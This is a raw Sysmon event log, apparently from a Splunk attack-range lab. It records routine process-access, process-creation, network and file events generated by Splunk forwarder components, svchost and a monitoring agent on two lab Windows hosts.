12:19:29.825{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015784Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.825{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015783Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.825{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015782Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.825{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015781Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.825{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015780Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.825{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015779Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.825{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015778Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.825{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015777Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.825{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015776Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.825{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E3D1-63C7-EF01-00000000B002}2652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015775Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.825{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E3D1-63C7-EF01-00000000B002}2652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015774Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.827{E5A8D418-E3D1-63C7-EF01-00000000B002}2652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000015773Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.778{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E17B86027CDE1A27E793F4671436F7FB,SHA256=451A1415B01AD26D916E0F29EA476C11AFC878FB17BB7CA1DD516D60580276BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040970Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:26.983{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56262-false10.0.1.12-8089- 10341000x800000000000000040969Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.888{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E3D1-63C7-1306-00000000AF02}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040968Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.888{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040967Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.888{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040966Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.888{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040965Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.888{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040964Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.888{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E3D1-63C7-1306-00000000AF02}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040963Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.888{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E3D1-63C7-1306-00000000AF02}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000040962Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.889{FE4C2B44-E3D1-63C7-1306-00000000AF02}3596C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000040961Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.225{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F42B3F963666CC438B600C8202B9CF4,SHA256=753F95911AE341E26FF4DC129463371A5517D59546BB1DB9A14B9D8E5E27B16A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015772Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:27.087{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50066-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015771Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.300{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=373ED92B0B2220DCB85BD1D08DB7D302,SHA256=A3468E9480F2266C92E107CB742F11A5F7EBB75044DA72D82C641F6BC5790D32,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015770Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.255{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E3D1-63C7-EE01-00000000B002}1116C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015769Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.254{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E3D1-63C7-EE01-00000000B002}1116C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015768Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.254{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E3D1-63C7-EE01-00000000B002}1116C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015767Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.202{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E3D1-63C7-EE01-00000000B002}1116C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015766Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 